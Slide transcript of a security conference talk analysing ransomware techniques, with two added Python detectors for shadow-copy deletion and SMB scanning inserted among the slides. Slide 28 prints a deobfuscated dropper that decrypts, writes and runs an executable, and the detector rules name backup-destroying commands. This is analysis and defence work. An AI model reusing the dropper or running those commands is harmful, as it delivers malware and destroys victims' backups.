
BSides - Hipster Ransomware

https://www.amirootyet.com/

Modern ransomware presents multi-faceted threats whose challenges go beyond data loss. Such ransomware includes routines that drop trojans and cryptocurrency-mining components. Some include state-of-the-art elliptic curve cryptography, advanced key-management models, new infection vectors, backup purging, and more. In this talk, we discuss the future of the most potent cryptoviral extortions as predicted via empirical analysis of real-world ransomware samples that are defying general trends and differentiating themselves from their peers. All arguments are backed by empirical evidence in the form of code snippets, system snapshots, and network packet dumps collected from real-world ransomware.

Pranshu Bajpai

August 07, 2018


Transcript

  1. Hipster Ransomware: Beyond Mere Encryption
     Pranshu Bajpai, August 7, 2018, BSides Chicago 2018
  2. Agenda
     1. Introduction
     2. Hipster Ransomware
     3. Attributes
        Cryptojacking: Best of Both Worlds
        ECDH: Judging a Book by its Cover
        Purge Backups: The Whole Nine Yards
        Dropping Spyware: Adding Insult to Injury
        Stealing Social Engineering’s Thunder
        Killswitches: Blessing in Disguise
        Process Doppelganging: Hiding in Plain Sight
     4. Conclusion
  3. Introduction

  4. About us
     • Pranshu Bajpai, PhD Candidate, Computer Science and Engineering, Michigan State University
       http://cse.msu.edu/~bajpaipr/
       https://www.linkedin.com/in/pranshubajpai/
       https://twitter.com/amirootyet
     • Richard Enbody, Associate Professor, Computer Science and Engineering, Michigan State University
       http://www.cse.msu.edu/~enbody/
  5. Related work
     • Young and Yung first formally introduced the concept of cryptoviral extortion (modern ransomware) in 1996
     • Young discusses ransomware and Microsoft’s CryptoAPI in 2006
     • Kharraz et al. discovered in 2015 that only 6% of the 1,359 analyzed samples were actually effective
  6. The primary elements of a ransomware
     • Infiltrate
     • Acquire encryption secret (key)
     • Encrypt
     • Demand ransom
  7. Common hybrid cryptosystem in ransomware
     • Ransomware compromises host
     • Generates symmetric encryption key
     • Encrypts symmetric key with a hard-coded asymmetric key
     • Provides attacker a copy of the encrypted symmetric key
     • Encrypts user data using the symmetric key
     • Destroys symmetric key on host
     • Displays ransom note
  8. Hipster Ransomware

  9. Hipster Ransomware: Contemporary Subculture
     Hipster Ransomware: ransomware variants with innovative features that offer competitive, strategic or operational advantage(s) to the ransomware developer
     Why?
     • Underground market can be competitive
     • Need for continuous innovation
     • Throw off malware analysts, even if briefly
  10. Attributes

  11. Attributes: Cryptojacking: Best of Both Worlds

  12. Cryptojacking: Best of Both Worlds
      • Cryptojacking is on the rise
      • Bundle a mining routine with the ransomware
      Why?
      • Runs in the background, creates no “noise”
      • Especially favorable to ransomware developers in the context of underdeveloped countries
      • At least some funds are generated even when the ransom is not paid
      • Cryptocurrencies such as Monero make it feasible to mine on an average processor
  13. Attributes: ECDH: Judging a Book by its Cover

  14. ECDH: Judging a Book by its Cover
      (Image source: quora.com)
      About ECDH
      • Elliptic curves: y^2 = x^3 + ax + b
      • Elliptic-curve Diffie-Hellman
      • Generate a shared secret over insecure channels
      • Use the derived key with a symmetric cipher to encrypt data
      Figure caption: draw a line from a to b, and then continue the line; it intersects only one other point on the elliptic curve.
      Ransomware use the Elliptic Curve Integrated Encryption Scheme (ECIES)
  15. ECDH: Judging a Book by its Cover
      Consider secp192k1 as deployed in Petya. Domain parameters over the finite field F: (p, a, b, G, n, h)
      • Field prime, p = 2^192 − 2^32 − 2^12 − 2^8 − 2^7 − 2^6 − 2^3 − 1
      • Curve: y^2 = x^3 + ax + b over F
      • Base point (compressed), G = 03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D
      • Order of G, n = FFFFFFFFFFFFFFFFFFFFFFFE26F2FC170F69466A74DEFD8D
      • Cofactor, h = 01
      Domain parameters are public!
  16. ECDH: Judging a Book by its Cover
      Encryption steps taken by a ransomware to implement ECIES:
      • Domain parameters and a public key, P, ship hard-coded with the binary
      • Secret integer, s, is kept safe with the attacker
  17. ECDH: Judging a Book by its Cover
      Upon infection
      • Generate random integer, t, using /dev/urandom or CryptGenRandom
      • Q = [t]G
      • h = H([t]P) ← encryption key!
      • Encrypt using h
      • Purge t and h from host
      Upon receiving payment
      • Demand Q from host
      • [s]Q = [s][t]G = [t][s]G = [t]P ← this property lets the attacker derive the same point that was used on the host
      • h = H([s]Q)
      • Attacker sends h back to victim
  18–19. ECDH: Judging a Book by its Cover
      Advantages for the attacker
      • Better for marketing
      • ECDH not as closely scrutinized as the popular RSA
      • Does not depend on resident CryptoAPIs to generate the symmetric key
      • Offers the same security as RSA for a smaller key size
  20. Attributes: Purge Backups: The Whole Nine Yards

  21. Purge Backups: The Whole Nine Yards
      Backups on host
      • Available as a mapped drive on the network, and/or
      • Windows default Shadow Volume (VSS) snapshots of the C: drive used by ‘System Restore’, and/or
      • Synced to the cloud using a client
      Ransomware
      • explicitly hunt for and encrypt network shares
      • purge VSS files on host
      • abuse sync clients of cloud services to encrypt files stored in the cloud
  22. Purge Backups: The Whole Nine Yards

  23. Purge Backups: The Whole Nine Yards

  24. Purge Backups: The Whole Nine Yards
      WNetAddConnection2W used to map network shares
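Slides 21 to 24 describe backup purging from the ransomware's side; the defender's counterpart is spotting the shadow-copy and recovery tampering in process-creation telemetry. The following is an added example, not from the talk: the events are constructed Sysmon-style records, the rule names are this example's own, and the command-line patterns are the commonly documented shadow-copy deletion and recovery-disabling invocations rather than anything quoted on the slides.

```python
"""Detect shadow-copy / backup tampering in process-creation telemetry.

Added example, not from the talk. Events below are constructed; the rule
names are this example's own; patterns cover well-known tampering commands.
"""
import re

# (rule name, pattern) matched against the full command line, case-insensitively.
RULES = [
    ("vss_delete_vssadmin", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows", re.I)),
    ("vss_delete_wmic", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete", re.I)),
    ("vss_delete_powershell", re.compile(r"win32_shadowcopy.*\bdelete\b", re.I)),
    ("backup_catalog_delete", re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+catalog", re.I)),
    ("recovery_disabled", re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
]

SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"ts": "2018-08-07T10:01:02Z", "host": "ws-17", "user": "CORP\\alice",
     "parent": "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice_0807.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2018-08-07T10:01:03Z", "host": "ws-17", "user": "CORP\\alice",
     "parent": "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice_0807.exe",
     "cmdline": "wmic.exe shadowcopy delete"},
    {"ts": "2018-08-07T10:01:04Z", "host": "ws-17", "user": "CORP\\alice",
     "parent": "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice_0807.exe",
     "cmdline": "bcdedit.exe /set {default} recoveryenabled No"},
    {"ts": "2018-08-07T09:30:00Z", "host": "srv-bk1", "user": "CORP\\backup-svc",
     "parent": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "vssadmin.exe list shadows"},          # benign: listing, not deleting
    {"ts": "2018-08-07T09:31:00Z", "host": "ws-02", "user": "CORP\\bob",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "notepad.exe C:\\Users\\bob\\notes.txt"},
]


def classify(cmdline):
    """Return the first matching rule name for a command line, or None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None


def scan(events):
    """Return one alert per matching event, in input order."""
    alerts = []
    for ev in events:
        rule = classify(ev["cmdline"])
        if rule:
            alerts.append({"rule": rule, "ts": ev["ts"], "host": ev["host"],
                           "parent": ev["parent"], "cmdline": ev["cmdline"]})
    return alerts


def group_by_parent(alerts):
    """Count distinct rules per (host, parent process).

    Several different tampering commands spawned by one parent in quick
    succession, especially a parent living in a user temp directory, is the
    strong signal; a single hit from a backup agent is often legitimate.
    """
    counts = {}
    for a in alerts:
        key = (a["host"], a["parent"])
        counts.setdefault(key, set()).add(a["rule"])
    return {k: len(v) for k, v in counts.items()}


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for a in found:
        print(f'{a["ts"]} {a["host"]} {a["rule"]}: {a["cmdline"]}')
    print(group_by_parent(found))
```

Feeding real Sysmon Event ID 1 (or Windows 4688 with command-line auditing enabled) records into `scan` is a matter of mapping the field names; the grouping step is what keeps the rule from paging on every backup job that happens to call vssadmin.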
  25. Attributes: Dropping Spyware: Adding Insult to Injury

  26–27. Dropping Spyware: Adding Insult to Injury
      • Drop other malware such as trojans to spy on users
      • Attack on data availability and confidentiality
      • Not good for reputation, hence not a common practice yet
      • No indication that the spyware is removed after payment
  28. Dropping Spyware: Adding Insult to Injury

      function NWvQtGjjfQX() {
          var data_pn = "TVrDiQNMSFE(...)QQURE";

          var cmd = "U2FsdGVkX1/LHQl+aIAo/hXHDEI5YmZZtBIcL...";
          var dec_cmd = CryptoJS.AES.decrypt(cmd, key_cmd);
          dec_cmd = CryptoJS.enc.Utf8.stringify(dec_cmd);
          eval(dec_cmd);
          return 0;
      }

      ... // decrypts to the following code // ...
      var flo = new ActiveXObject("ADODB.Stream");
      var runer = WScript.CreateObject("WScript.Shell");
      var wher = runer.SpecialFolders("MyDocuments");
      wher = wher + "\\" + "st.exe";
      flo.CharSet = "437";
      flo.Open();
      var pny = data_pn.replace(/NMSIOP/g, "A");
      var pny_ar = CryptoJS.enc.Base64.parse(pny);
      var pny_dec = pny_ar.toString(CryptoJS.enc.Utf8);
      flo.Position = 0;
      flo.SetEOS;
      flo.WriteText(pny_dec);
      flo.SaveToFile(wher, 2);
      flo.Close;
      wher = "\"" + wher + "\"";
      runer.Run(wher);

      Key and IV embedded in the Jigsaw ransomware
  29. Dropping Spyware: Adding Insult to Injury
      Trojan dropper observed in RAA ransomware
  30. Attributes: Stealing Social Engineering’s Thunder

  31. Stealing Social Engineering’s Thunder
      • Phishing has been the predominant attack vector among malware
      • Relies on exploiting human gullibility
      • Attackers are moving on to more efficient attack vectors
      • WannaCry exploits EternalBlue
      • SamSam exploits weak RDP protection
  32. Stealing Social Engineering’s Thunder
      WannaCry begins scanning port 445 to exploit EternalBlue
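The port-445 sweep on slide 32 is visible from the network long before any exploitation succeeds: one source fanning out to many distinct peers on TCP/445 inside a short window. Below is an added example, not from the talk, that flags such fan-out over flow records; the flows are constructed, and the window size and threshold are tunable assumptions rather than values from the slide.

```python
"""Flag hosts fanning out to many peers on TCP/445 (SMB) in a short window.

Added example, not from the talk. Flow records are constructed; window
and threshold are assumed defaults that a SOC would tune per network.
"""
from collections import defaultdict, deque


def find_smb_scanners(flows, window_s=60, threshold=20, port=445):
    """flows: iterable of (src, dst, dport, ts_seconds).

    Returns {src: ts} where ts is the moment src first reached `threshold`
    distinct destinations on `port` within a sliding window of window_s.
    """
    recent = defaultdict(deque)      # src -> deque of (ts, dst), oldest first
    hits = {}
    for src, dst, dport, ts in sorted(flows, key=lambda f: f[3]):
        if dport != port:
            continue
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window_s:     # drop flows outside the window
            q.popleft()
        if src not in hits and len({d for _, d in q}) >= threshold:
            hits[src] = ts
    return hits


def constructed_flows():
    """Synthetic traffic: one lateral-movement sweep and two benign hosts."""
    flows = []
    # 10.0.0.5: ordinary file-server use, the same two servers all morning
    for i in range(40):
        flows.append(("10.0.0.5", "10.0.1.10" if i % 2 else "10.0.1.11", 445, 100 + 90 * i))
    # 10.0.0.9: an admin touching six hosts over RDP, not SMB
    for i in range(6):
        flows.append(("10.0.0.9", f"10.0.2.{i + 1}", 3389, 500 + 5 * i))
    # 10.0.0.77: sweeps a /24 on 445, one new host per second
    for i in range(30):
        flows.append(("10.0.0.77", f"10.0.3.{i + 1}", 445, 1000 + i))
    return flows


if __name__ == "__main__":
    for src, ts in find_smb_scanners(constructed_flows()).items():
        print(f"{src} reached the fan-out threshold on tcp/445 at t={ts}s")
```

Counting distinct destinations rather than raw connection attempts is what separates the sweep from a busy workstation talking to the same file server, and the sliding window keeps a slow, months-long inventory job from accumulating into a false positive.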
  33. Attributes: Killswitches: Blessing in Disguise

  34. Blessing in Disguise
      Killswitch: a control that effectively neutralizes the ransomware such that it never executes its encryption routine.
      • Gained widespread attention with WannaCry
      • Allows ransomware operators some form of control over the campaign(?)
      • Can be exploited by security researchers if outside the attacker’s control
      • NotPetya checks for perfc file in C:\Windows\... ← not really a killswitch
      • Will we observe more ransomware killswitches in future?
  35. Attributes: Process Doppelganging: Hiding in Plain Sight

  36. Process Doppelganging: Hiding in Plain Sight
      SynAck Ransomware
      • First ransomware discovered to use process doppelganging
      • Uses the technique to evade detection by antivirus solutions
      • Avoids making unexpected changes to the filesystem
      • Doesn’t execute if run from unexpected locations
      • Doesn’t execute if the keyboard setting on the host is ‘Cyrillic’
      • Primary attack vector is RDP
  37–40. Process Doppelganging: Hiding in Plain Sight
      Process Doppelganging
      • First discussed at Black Hat Europe, December 2017, by the enSilo team
      • Overwrite an executable with malicious code
      • Load malicious executable
      • Rollback to original
      • Execute malicious code
      Ransomware executes in the context of a legitimate process ⟹ AV will not detect the malicious code!
  41. Conclusion

  42. Conclusion
      • Ransomware innovate and evolve, just like any other product
      • What is hipster today might become a trend tomorrow
      • Early anticipation of future malware trends helps create better responses
  43. Questions
      • BSides Chicago organizers: for the support!
      • Michigan State infosec team: for continuous help and support!
      Questions? @amirootyet